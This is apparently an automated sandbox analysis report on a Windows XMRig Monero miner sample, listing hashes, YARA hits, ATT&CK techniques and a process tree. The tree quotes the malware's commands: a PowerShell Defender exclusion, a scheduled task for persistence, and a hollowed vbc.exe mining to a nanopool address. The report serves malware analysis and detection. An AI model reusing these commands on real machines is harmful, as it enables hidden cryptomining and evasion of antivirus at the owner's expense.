xmrig | 66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

Analysis

max time kernel
135s
max time network
163s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

1.3MB
MD5

8851bd99bb8728fa34a8a7afce73b36e
SHA1

d9a7790e4f41673f6a484180c717c778b258308e
SHA256

66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d
SHA512

ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f
SSDEEP

24576:n8E0T8wpeIq79Bu+pj+SRLQdqJptmfXCFIif/:nZ0TbpeIq7HumRLQkJpoKFIif

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1856-187-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1856-188-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/1856-189-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1856-190-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1856-192-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

OWT.exe

pid process

4200 OWT.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

OWT.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation OWT.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

OWT.exe

description pid process target process

PID 4200 set thread context of 1856 4200 OWT.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

540 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3504 timeout.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exeOWT.exe

pid process

1888 powershell.exe
1888 powershell.exe
4376 powershell.exe
4376 powershell.exe
4200 OWT.exe
4200 OWT.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

648

pid	process
4200	OWT.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	OWT.exe

description	pid	process	target process
PID 4200 set thread context of 1856	4200	OWT.exe	vbc.exe

pid	process
540	schtasks.exe

pid	process
3504	timeout.exe

pid	process
1888	powershell.exe
1888	powershell.exe
4376	powershell.exe
4376	powershell.exe
4200	OWT.exe
4200	OWT.exe

pid	process
648

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

file.exepowershell.exeOWT.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	588	file.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	4200	OWT.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeLockMemoryPrivilege	1856	vbc.exe
Token: SeLockMemoryPrivilege	1856	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

1856 vbc.exe

pid	process
1856	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

file.execmd.exeOWT.execmd.exe

description	pid	process	target process
PID 588 wrote to memory of 1888	588	file.exe	powershell.exe
PID 588 wrote to memory of 1888	588	file.exe	powershell.exe
PID 588 wrote to memory of 2100	588	file.exe	cmd.exe
PID 588 wrote to memory of 2100	588	file.exe	cmd.exe
PID 2100 wrote to memory of 3504	2100	cmd.exe	timeout.exe
PID 2100 wrote to memory of 3504	2100	cmd.exe	timeout.exe
PID 2100 wrote to memory of 4200	2100	cmd.exe	OWT.exe
PID 2100 wrote to memory of 4200	2100	cmd.exe	OWT.exe
PID 4200 wrote to memory of 4376	4200	OWT.exe	powershell.exe
PID 4200 wrote to memory of 4376	4200	OWT.exe	powershell.exe
PID 4200 wrote to memory of 1264	4200	OWT.exe	cmd.exe
PID 4200 wrote to memory of 1264	4200	OWT.exe	cmd.exe
PID 1264 wrote to memory of 540	1264	cmd.exe	schtasks.exe
PID 1264 wrote to memory of 540	1264	cmd.exe	schtasks.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe
PID 4200 wrote to memory of 1856	4200	OWT.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CC8.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:2100

C:\Windows\system32\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:3504

C:\ProgramData\winrar\OWT.exe
"C:\ProgramData\winrar\OWT.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"
5⤵
- Creates scheduled task(s)
PID:540

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1856

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
8851bd99bb8728fa34a8a7afce73b36e

SHA1
d9a7790e4f41673f6a484180c717c778b258308e

SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f

Download Submit
C:\ProgramData\winrar\OWT.exe

Filesize
1.3MB

MD5
8851bd99bb8728fa34a8a7afce73b36e

SHA1
d9a7790e4f41673f6a484180c717c778b258308e

SHA256
66d3e2e7a164f88efb1aecc3c81dbf1d29590a0e852f7dcebda595467027ab3d

SHA512
ff8b2a5ce027aef8f046c22fb77d4448d3f6fc4c0a117e9cb1b08b16d9e993a3c74846428974cc56f754b73d41b9a15863b9e5bc7c776b7a859d073d7e145f6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4CC8.tmp.bat

Filesize
138B

MD5
faa297b8630d6d87df59ae204e44dcf7

SHA1
a05a77869198ad6c2e10ddcd0f6222127cc3e022

SHA256
7021d9c2b7667d5a0474eb34f58d1d767acb71e644b92ce0a4d7d6ea8ff82685

SHA512
43a65b362d1023adda9de42aab676756548b3935aa34cb719dd42f2802e527552a31482a5b43e62587d0787147dfd0e7fe51ddd726ef67b3098eb1edcf0df5d8

Download Submit
memory/540-177-0x0000000000000000-mapping.dmp

Download
memory/588-141-0x00007FFE19390000-0x00007FFE193BB000-memory.dmp

Filesize
172KB

Download
memory/588-144-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/588-139-0x00007FFE18520000-0x00007FFE186C1000-memory.dmp

Filesize
1.6MB

Download
memory/588-140-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/588-138-0x0000000003460000-0x00000000034A1000-memory.dmp

Filesize
260KB

Download
memory/588-142-0x0000000000110000-0x00000000002CE000-memory.dmp

Filesize
1.7MB

Download
memory/588-143-0x00007FFDFC4E0000-0x00007FFDFC62E000-memory.dmp

Filesize
1.3MB

Download
memory/588-136-0x00007FFDFC630000-0x00007FFDFC6ED000-memory.dmp

Filesize
756KB

Download
memory/588-147-0x0000000000110000-0x00000000002CE000-memory.dmp

Filesize
1.7MB

Download
memory/588-148-0x0000000003460000-0x00000000034A1000-memory.dmp

Filesize
260KB

Download
memory/588-152-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/588-133-0x00007FFDFC6F0000-0x00007FFDFC79A000-memory.dmp

Filesize
680KB

Download
memory/588-137-0x0000000000110000-0x00000000002CE000-memory.dmp

Filesize
1.7MB

Download
memory/588-135-0x00007FFE15B10000-0x00007FFE15B22000-memory.dmp

Filesize
72KB

Download
memory/588-134-0x00007FFE192F0000-0x00007FFE1938E000-memory.dmp

Filesize
632KB

Download
memory/1264-175-0x0000000000000000-mapping.dmp

Download
memory/1856-197-0x000001D1A24F0000-0x000001D1A2510000-memory.dmp

Filesize
128KB

Download
memory/1856-187-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1856-200-0x000001D1A3EB0000-0x000001D1A3ED0000-memory.dmp

Filesize
128KB

Download
memory/1856-198-0x000001D1A3EB0000-0x000001D1A3ED0000-memory.dmp

Filesize
128KB

Download
memory/1856-199-0x000001D1A24F0000-0x000001D1A2510000-memory.dmp

Filesize
128KB

Download
memory/1856-188-0x0000000140343234-mapping.dmp

Download
memory/1856-196-0x000001D235F10000-0x000001D235F50000-memory.dmp

Filesize
256KB

Download
memory/1856-192-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1856-191-0x000001D1A2490000-0x000001D1A24B0000-memory.dmp

Filesize
128KB

Download
memory/1856-190-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1856-189-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1888-161-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/1888-153-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/1888-149-0x00000243F3320000-0x00000243F3342000-memory.dmp

Filesize
136KB

Download
memory/1888-145-0x0000000000000000-mapping.dmp

Download
memory/2100-146-0x0000000000000000-mapping.dmp

Download
memory/3504-151-0x0000000000000000-mapping.dmp

Download
memory/4200-166-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4200-186-0x00007FFE16FC0000-0x00007FFE16FFB000-memory.dmp

Filesize
236KB

Download
memory/4200-154-0x0000000000000000-mapping.dmp

Download
memory/4200-171-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4200-170-0x00007FFE0BAA0000-0x00007FFE0BBEE000-memory.dmp

Filesize
1.3MB

Download
memory/4200-158-0x00000000006A0000-0x000000000085E000-memory.dmp

Filesize
1.7MB

Download
memory/4200-180-0x00000000006A0000-0x000000000085E000-memory.dmp

Filesize
1.7MB

Download
memory/4200-181-0x0000000002CD0000-0x0000000002D11000-memory.dmp

Filesize
260KB

Download
memory/4200-182-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4200-179-0x00007FFE18170000-0x00007FFE18197000-memory.dmp

Filesize
156KB

Download
memory/4200-183-0x00007FFDFC860000-0x00007FFDFC895000-memory.dmp

Filesize
212KB

Download
memory/4200-184-0x00007FFDF5E20000-0x00007FFDF5F22000-memory.dmp

Filesize
1.0MB

Download
memory/4200-185-0x00007FFE186F0000-0x00007FFE1875B000-memory.dmp

Filesize
428KB

Download
memory/4200-159-0x0000000002CD0000-0x0000000002D11000-memory.dmp

Filesize
260KB

Download
memory/4200-169-0x00000000006A0000-0x000000000085E000-memory.dmp

Filesize
1.7MB

Download
memory/4200-168-0x00000000006A0000-0x000000000085E000-memory.dmp

Filesize
1.7MB

Download
memory/4200-167-0x00007FFE19390000-0x00007FFE193BB000-memory.dmp

Filesize
172KB

Download
memory/4200-165-0x00007FFE18520000-0x00007FFE186C1000-memory.dmp

Filesize
1.6MB

Download
memory/4200-164-0x00007FFDFC630000-0x00007FFDFC6ED000-memory.dmp

Filesize
756KB

Download
memory/4200-163-0x00007FFE15B10000-0x00007FFE15B22000-memory.dmp

Filesize
72KB

Download
memory/4200-193-0x00000000006A0000-0x000000000085E000-memory.dmp

Filesize
1.7MB

Download
memory/4200-194-0x0000000002CD0000-0x0000000002D11000-memory.dmp

Filesize
260KB

Download
memory/4200-195-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4200-162-0x00007FFE192F0000-0x00007FFE1938E000-memory.dmp

Filesize
632KB

Download
memory/4200-160-0x00007FFDFC6F0000-0x00007FFDFC79A000-memory.dmp

Filesize
680KB

Download
memory/4376-174-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4376-178-0x00007FFDFAF70000-0x00007FFDFBA31000-memory.dmp

Filesize
10.8MB

Download
memory/4376-172-0x0000000000000000-mapping.dmp

Download